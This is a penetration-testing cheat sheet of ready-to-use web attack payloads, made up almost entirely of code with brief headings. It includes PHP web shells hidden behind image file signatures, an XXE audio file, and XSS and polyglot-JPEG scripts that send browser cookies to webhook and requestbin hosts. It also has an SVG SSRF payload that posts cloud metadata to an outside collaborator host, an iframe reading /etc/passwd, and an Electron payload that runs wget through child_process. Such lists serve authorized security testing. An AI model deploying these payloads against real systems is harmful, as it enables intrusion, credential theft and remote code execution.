# Payloads

## File Upload

{% code overflow="wrap" %}

```bash
# JPG
echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg
# PNG
echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
# GIF
echo -n -e '\x47\x49\x46\x38<?php system($_GET["cmd"]);?>.' > shell.gif
# BMP
echo -n -e '\x42\x4D<?php system($_GET["cmd"]);?>.' > shell.bmp
# WAV (XXE)
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00YOUR_XML_PAYLOAD_HERE\x00' > payload.wav
```

{% endcode %}

### Bypass CSP Polyglot JPEG

Payload to embed in the picture via hxd (Use this [POC](http://portswigger-labs.net/polyglot/jpeg/xss.jpg))

```javascript
document.location='<WEBHOOK>/zeyad?c='+encodeURIComponent(btoa(document.cookie));
```

Code to execute code as JS

```html
<script charset="ISO-8859-1" src="http://portswigger-labs.net/polyglot/jpeg/xss.jpg"></script>
```

Research link: <https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs>

## Server Side Request Forgery

### **SVG**

{% code overflow="wrap" %}

```svg
<svg width="100%" height="100%" viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><image xlink:href="https://google.com/favicon.ico" height="20" width="20" onload="fetch('http://169.254.169.254/latest/meta-data/hostname').then(function (response) {response.text().then(function(text) {var params = text;var http = new XMLHttpRequest();var url = 'https://<>.burpcollaborator.net/';http.open('POST', url, true);http.send(params);})});" /></svg>
```

{% endcode %}

### Meta Tags

```html
<meta http-equiv="refresh" content="0;url=http://169.254.169.254" />
```

### Style tags

{% code overflow="wrap" %}

```html
<style><h1>h1taginjection</h1><iframe xmlns="http://www.w3.org/1999/xhtml" src="file:///etc/passwd" width="800" height="850"/>
    @import url(http://ta79rlzq77p2kdoak91nqryxlorff4.burpcollaborator.net/import.css);</style>
```

{% endcode %}

### &#x20;HTTP Redirect

<pre class="language-php"><code class="lang-php"><strong># ?url=http://your-domain/r.php
</strong># [ r.php ]
&#x3C;?php
header('Location: http://127.0.0.1:8080/server-status');
?>
</code></pre>

### Edge Side Include

```xml
<esi:include src=http://127.0.0.1/server-status/>
<esi:include src=http://internal_domain/server_base_csrf_page/>
```

## Electron RCE

```html
<head>
        <meta property="og:description" content="<img src=x onerror=&quot;top.require('child_process').execSync('wget https://1a6c-37-36-116-188.eu.ngrok.io')&quot;>">
</head>
```

### More

* <https://www.hahwul.com/phoenix/ssrf-open-redirect/>
* <https://github.com/cujanovic/SSRF-Testing>

## XSS

### Markdown

```markdown
![<img src="#" onerror="src='http://requestbin.net/r/12bfihl1?c='+document.cookie; this.onerror=null"/>](#){onerror=outerHTML=alt}
```

### Payload in hashstring

```html
"<iframe/onload=eval(atob(location.hash.substring(1)))>"@calc.sh
```